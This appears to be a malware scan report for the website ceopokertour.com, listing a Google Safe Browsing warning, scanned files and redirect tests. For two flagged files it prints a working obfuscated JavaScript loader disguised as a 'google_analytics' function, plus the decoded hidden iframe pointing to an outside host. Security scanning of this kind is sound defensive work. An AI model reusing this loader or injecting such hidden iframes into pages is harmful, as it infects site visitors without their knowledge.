Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ceopokertour.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.ceopokertour.com/ | 200 OK Content-Length: 15269 Content-Type: text/html | clean |
http://www.ceopokertour.com/script.js | 404 Not Found Content-Length: 1139 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function google_analytics(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,48,51,46,1,40,45,37,26,17,0,0,0,0,0,0,8,62,39,10,27,43,33,0,28,23,25,22,55,49,59,50,12,18,19,7,13,14,35,3,57,31,36,0,0,0,0,9,0,20,29,38,21,30,6,4,52,24,41,47,15,32,61,2,60,11,53,44,54,56,16,34,5,42,58);
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8; s-=2}else{s=6}}document.write(r)}}google_analytics("KUP2ikpMlEitiBp7@CsLeETZxK5LikP2PDHMqNHtgUPMxUPMgcH2WI_c@yiLWNsLoY_wDw5wo0p1TqsLIwuc@yitel6MlY_wUlHt8DpORW_MxRp2@Qj7xUP2ikpMlR_") Decoded script: <iframe src="http://traffloads.in/in.cgi?2" width="1" height="1" style="display:none"></iframe> Antivirus reports:
| ||
http://www.ceopokertour.com/test404page.js | 404 Not Found Content-Length: 1144 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function google_analytics(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,48,51,46,1,40,45,37,26,17,0,0,0,0,0,0,8,62,39,10,27,43,33,0,28,23,25,22,55,49,59,50,12,18,19,7,13,14,35,3,57,31,36,0,0,0,0,9,0,20,29,38,21,30,6,4,52,24,41,47,15,32,61,2,60,11,53,44,54,56,16,34,5,42,58);
for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8; s-=2}else{s=6}}document.write(r)}}google_analytics("KUP2ikpMlEitiBp7@CsLeETZxK5LikP2PDHMqNHtgUPMxUPMgcH2WI_c@yiLWNsLoY_wDw5wo0p1TqsLIwuc@yitel6MlY_wUlHt8DpORW_MxRp2@Qj7xUP2ikpMlR_") Decoded script: <iframe src="http://traffloads.in/in.cgi?2" width="1" height="1" style="display:none"></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ceopokertour.com
Result:
GET / HTTP/1.1
Host: ceopokertour.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ceopokertour.com
Referer: http://www.google.com/search?q=ceopokertour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ceopokertour.com
Referer: http://www.google.com/search?q=ceopokertour.com
Result:
The result is similar to the first query. There are no suspicious redirects found.